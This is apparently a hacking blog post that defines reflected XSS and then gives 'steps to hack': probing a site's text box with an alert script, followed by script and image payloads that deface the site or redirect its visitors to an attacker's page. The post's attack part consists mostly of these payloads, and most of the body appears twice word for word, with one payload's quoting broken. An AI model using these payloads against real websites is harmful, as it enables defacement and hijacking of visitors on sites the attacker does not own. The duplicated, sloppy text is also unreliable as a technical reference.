Cross-site scripting (XSS) is a type of computer security vulnerability
typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.
Types of XSS vulnerabilities:
1.Persistent
2.Non persistent
In this post i am going to explain about the non persistent vulnerability.
Non persistent XSS vulnerability is the Most Common Type of XSS Flaw. It is a Server Side Vulnerability
When a Web Server takes any input from a User and returns the same back to the User without any Validation, This leads to a Non-Persistent XSS Vulnerability.
What can a hacker do with this??
XSS Attacks be used for the following:
•Compromising and Hijacking Accounts
•Stealing User Cookies
•Defacing Websites
•Phishing Attacks
•Posting False or Hostile Content
Steps to hack:
Step 1: Find vulnerability.
Step 2: Deface.
Finding out the vulnerability:
1)Find a textbox in the site or something where you can submit text.
2)Type in the following:
<script>alert("hackinginception");</script>
3)If it is vulnerable it should look like this:
Defacing:
There are some ways to deface a site when you find a XSS vulnerability.
1) Makes A Picture Pop-Up:
"><script>location="www.website.com/yourdefacepic";</script>
2) Replace The Content Of The Page By An Image:
<img src="yoursite.com/yourdefacepic/>
3)Redirect To A Website
<script>window.location="http://www.yoursite.com"</script>
Types of XSS vulnerabilities:
1.Persistent
2.Non persistent
In this post i am going to explain about the non persistent vulnerability.
Non persistent XSS vulnerability is the Most Common Type of XSS Flaw. It is a Server Side Vulnerability
When a Web Server takes any input from a User and returns the same back to the User without any Validation, This leads to a Non-Persistent XSS Vulnerability.
What can a hacker do with this??
XSS Attacks be used for the following:
•Compromising and Hijacking Accounts
•Stealing User Cookies
•Defacing Websites
•Phishing Attacks
•Posting False or Hostile Content
Steps to hack:
Step 1: Find vulnerability.
Step 2: Deface.
Finding out the vulnerability:
1)Find a textbox in the site or something where you can submit text.
2)Type in the following:
<script>alert("hackinginception");</script>
3)If it is vulnerable it should look like this:
Defacing:
There are some ways to deface a site when you find a XSS vulnerability.
1) Makes A Picture Pop-Up:
"><script>location="www.website.com/yourdefacepic";</script>
2) Replace The Content Of The Page By An Image:
<img src="yoursite.com/yourdefacepic/>
3)Redirect To A Website
<script>window.location="http://www.yoursite.com"</script>
Aucun commentaire:
Enregistrer un commentaire